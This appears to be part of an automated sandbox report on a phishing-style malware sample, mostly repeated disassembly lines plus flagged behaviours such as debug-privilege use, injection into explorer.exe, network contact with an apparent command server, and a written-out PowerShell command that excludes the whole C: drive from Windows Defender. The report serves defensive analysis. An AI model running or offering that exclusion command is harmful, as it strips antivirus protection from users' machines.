Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h] 32_2_04D46C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h] 32_2_04D46C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h] 32_2_04D46C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h] 32_2_04D46C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFBC2C mov eax, dword ptr fs:[00000030h] 32_2_04CFBC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov ecx, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D78DF1 mov eax, dword ptr fs:[00000030h] 32_2_04D78DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h] 32_2_04CDD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h] 32_2_04CDD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h] 32_2_04D8FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h] 32_2_04D8FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h] 32_2_04D8FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h] 32_2_04D8FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h] 32_2_04CC2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h] 32_2_04CC2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h] 32_2_04CC2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h] 32_2_04CC2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h] 32_2_04CC2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h] 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h] 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h] 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h] 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h] 32_2_04CFFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h] 32_2_04CFFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF35A1 mov eax, dword ptr fs:[00000030h] 32_2_04CF35A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h] 32_2_04D905AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h] 32_2_04D905AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h] 32_2_04CF1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h] 32_2_04CF1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h] 32_2_04CF1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D03D43 mov eax, dword ptr fs:[00000030h] 32_2_04D03D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D43540 mov eax, dword ptr fs:[00000030h] 32_2_04D43540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D73D40 mov eax, dword ptr fs:[00000030h] 32_2_04D73D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE7D50 mov eax, dword ptr fs:[00000030h] 32_2_04CE7D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h] 32_2_04CEC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h] 32_2_04CEC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8E539 mov eax, dword ptr fs:[00000030h] 32_2_04D8E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D4A537 mov eax, dword ptr fs:[00000030h] 32_2_04D4A537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98D34 mov eax, dword ptr fs:[00000030h] 32_2_04D98D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h] 32_2_04CF4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h] 32_2_04CF4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h] 32_2_04CF4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCAD30 mov eax, dword ptr fs:[00000030h] 32_2_04CCAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF36CC mov eax, dword ptr fs:[00000030h] 32_2_04CF36CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98ED6 mov eax, dword ptr fs:[00000030h] 32_2_04D98ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D7FEC0 mov eax, dword ptr fs:[00000030h] 32_2_04D7FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D08EC7 mov eax, dword ptr fs:[00000030h] 32_2_04D08EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF16E0 mov ecx, dword ptr fs:[00000030h] 32_2_04CF16E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD76E2 mov eax, dword ptr fs:[00000030h] 32_2_04CD76E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5FE87 mov eax, dword ptr fs:[00000030h] 32_2_04D5FE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D446A7 mov eax, dword ptr fs:[00000030h] 32_2_04D446A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h] 32_2_04D90EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h] 32_2_04D90EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h] 32_2_04D90EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h] 32_2_04D8AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h] 32_2_04D8AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD766D mov eax, dword ptr fs:[00000030h] 32_2_04CD766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h] 32_2_04CEAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h] 32_2_04CEAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h] 32_2_04CEAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h] 32_2_04CEAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h] 32_2_04CEAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h] 32_2_04CCC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h] 32_2_04CCC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h] 32_2_04CCC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF8E00 mov eax, dword ptr fs:[00000030h] 32_2_04CF8E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81608 mov eax, dword ptr fs:[00000030h] 32_2_04D81608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h] 32_2_04CFA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h] 32_2_04CFA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D7FE3F mov eax, dword ptr fs:[00000030h] 32_2_04D7FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCE620 mov eax, dword ptr fs:[00000030h] 32_2_04CCE620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D037F5 mov eax, dword ptr fs:[00000030h] 32_2_04D037F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h] 32_2_04D47794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h] 32_2_04D47794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h] 32_2_04D47794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD8794 mov eax, dword ptr fs:[00000030h] 32_2_04CD8794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDEF40 mov eax, dword ptr fs:[00000030h] 32_2_04CDEF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDFF60 mov eax, dword ptr fs:[00000030h] 32_2_04CDFF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98F6A mov eax, dword ptr fs:[00000030h] 32_2_04D98F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h] 32_2_04CFA70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h] 32_2_04CFA70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h] 32_2_04D5FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h] 32_2_04D5FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h] 32_2_04D9070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h] 32_2_04D9070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEF716 mov eax, dword ptr fs:[00000030h] 32_2_04CEF716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h] 32_2_04CC4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h] 32_2_04CC4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFE730 mov eax, dword ptr fs:[00000030h] 32_2_04CFE730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov ecx, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC58EC mov eax, dword ptr fs:[00000030h] 32_2_04CC58EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h] 32_2_04CC40E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h] 32_2_04CC40E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h] 32_2_04CC40E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC9080 mov eax, dword ptr fs:[00000030h] 32_2_04CC9080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h] 32_2_04D43884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h] 32_2_04D43884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFF0BF mov ecx, dword ptr fs:[00000030h] 32_2_04CFF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h] 32_2_04CFF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h] 32_2_04CFF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D090AF mov eax, dword ptr fs:[00000030h] 32_2_04D090AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h] 32_2_04CE0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h] 32_2_04CE0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D82073 mov eax, dword ptr fs:[00000030h] 32_2_04D82073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D91074 mov eax, dword ptr fs:[00000030h] 32_2_04D91074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h] 32_2_04D47016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h] 32_2_04D47016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h] 32_2_04D47016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h] 32_2_04D94015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h] 32_2_04D94015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h] 32_2_04CCB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h] 32_2_04CCB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h] 32_2_04CCB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D541E8 mov eax, dword ptr fs:[00000030h] 32_2_04D541E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA185 mov eax, dword ptr fs:[00000030h] 32_2_04CFA185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEC182 mov eax, dword ptr fs:[00000030h] 32_2_04CEC182
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2990 mov eax, dword ptr fs:[00000030h] 32_2_04CF2990
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D469A6 mov eax, dword ptr fs:[00000030h] 32_2_04D469A6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h] 32_2_04CEB944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h] 32_2_04CEB944
Enables debug privileges
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.90 80
Source: C:\Windows\explorer.exe Domain query: www.seniorlivingcaelderly.com
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\ Jump to behavior
Maps a DLL or memory area into another process
